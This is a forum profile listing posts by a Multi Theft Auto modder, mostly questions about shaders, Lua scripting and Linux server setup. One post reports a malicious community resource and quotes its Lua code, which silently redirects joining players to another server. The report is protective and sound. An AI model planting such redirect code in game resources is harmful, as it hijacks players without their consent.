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Everything posted by megaman54

  1. Thank you! I guess I have to do some tests with shaders until someone responds.
  2. I would like to try and make a shader/script that applies baked lighting to models and to do so I need to access UV Channel 2 of the custom models. Does GTA even support models with a second UV channel and if so, how can I access the channel in the shader code?
  3. On most 3D modeling applications there is a gizmo like this in the viewport that rotates with the camera, showing where the 3 axis are. Example image: https://imgur.com/a/k1Ykc How would I go about making such gizmo in MTA? I'm not that good with math so I hope someone can give me some pointers. Thanks.
  4. You could make your own module for the server. Since modules are writte in C++, you could write complete functions there and just calls them from lua.
  5. You could make your own module for the server. Since modules are writte in C++, you could write complete functions there and just calls them from lua.
  6. I dont know about performance difference but atleast with shaders, you can replace invidual textures without having to download the whole .txd file. Also in my experience, shaders have always worked but often .txd s fail to load.
  7. Who would make a account system with clientside database? That wouldnt even work.
  8. How is it a security risk if there is a .db file located in the client's mods folder that is accessed with the SQL functions? The client cannot connect to any other database other than what the resource has created clientside. I'm talking about local SQL databases and not those running externally. XML is slow and in the script i have, it is not possible to move the data to server side and use triggerServerEvent.
  9. Are the SQL functions coming to client side anytime soon?
  10. This is as close to real as handling gets with GTA:SA physics.
  11. my useless and compiled resource: https://community.multitheftauto.com/index.php?p=resources&s=details&id=2751 please remove it. thanks DONE
  12. Can you please explain what do you mean by "screen effects"? Like, Wet screen if it rains, someone else made a resource that does exactly that I mean like lightning strike effects. When it strikes, screen will flash etc. Also if you can, you could make some lightning strike effects on the sky to make it even more realistic Other thing i'd like to see is that when lightning strikes, instead of the whole screen flashing, make the world flash by using shaders. I hope this helps
  13. Awesome script man! You should add some screen effects too as the default ones from GTA are pretty bad.
  14. How can i draw a bounding box around all objects that are currently streamed in? I tried with this code but it doesnt draw anything and i dont know why function render() for i,v in ipairs(getElementsByType("object", root, true))do local x,y,z = getElementPosition(v) local mix,miy,miz,max,may,maz = getElementBoundingBox(v) local x1,y1 = getScreenFromWorldPosition(mix+x,miy+y,miz+z) local x2,y2 = getScreenFromWorldPosition(max+x,may+y,maz+z) dxDrawLine(x1,y1,x2,y2,tocolor(255,0,0,255)) end end addEventHandler("onClientRender", root, render)
  15. I got it working now. Was a problem with directory permissions.
  16. So i have setup everything else but when i start the server i get this error: MTA:BLUE Server for MTA:SA [21:07:16] Server stopped!erver! [21:07:16] ERROR: Could not read or create server-id keys file at '/var/www/mtaserver/mods/deathmatch/server-id.keys' I'm trying to start it through SSH. I'm fairly new with running servers on Linux so i would appreciate any help!
  17. Thanks for the shader code! Now i can get this script started properly
  18. So i want to create a shader which takes an image file (.png etc) and checks for specified pixel color and makes those pixels totally transparent. I kinda know how i would write the lua script but the HLSL language for shader is pretty much new to me so i was hoping if someone more experienced in HLSL would guide me a little. Thx
  19. https://community.multitheftauto.com/index.php?p= ... ls&id=9655 i'm pretty sure that this guy cheated his way to being the top rated resource in the community with just 286 downloads and the script itself not being anything so spectacular.
  20. This guy: https://community.multitheftauto.com/index.php?p= ... ls&id=9706 stole my/mrhankeys code and changed author to himself. Here is my upload: https://community.multitheftauto.com/index.php?p= ... ls&id=1570 I checked the scripts on both and the code matches, command name and author name in meta is the only thing changed. DONE
  21. This resource has malicious code in it: https://community.multitheftauto.com/index.php?p=resources&s=details&id=9194 The code is as follows: local sIP = ""; local iPort = 22107; local sPassword = ""; local bStart = false; function RedirectPlayer( pPlayer ) redirectPlayer ( pPlayer, sIP, iPort, sPassword ); end addEventHandler( "onPlayerJoin", root, function() RedirectPlayer( source ); end ); if bStart then addEventHandler( "onResourceStart", resourceRoot, function() local aPlayers = getElementsByType( "player" ); for i, pPlayer in ipairs( aPlayers ) do RedirectPlayer( pPlayer ); end end ); end It redirects players to a server which is likely to be the uploaders server. This resource has the same malicious code: https://community.multitheftauto.com/index.php?p=resources&s=details&id=9177 DONE, USER BANNED.
  22. Maybe this helps in some way https://forum.multitheftauto.com/viewtopic.php?p=329778#p329778
  23. Thanks! This should get me started
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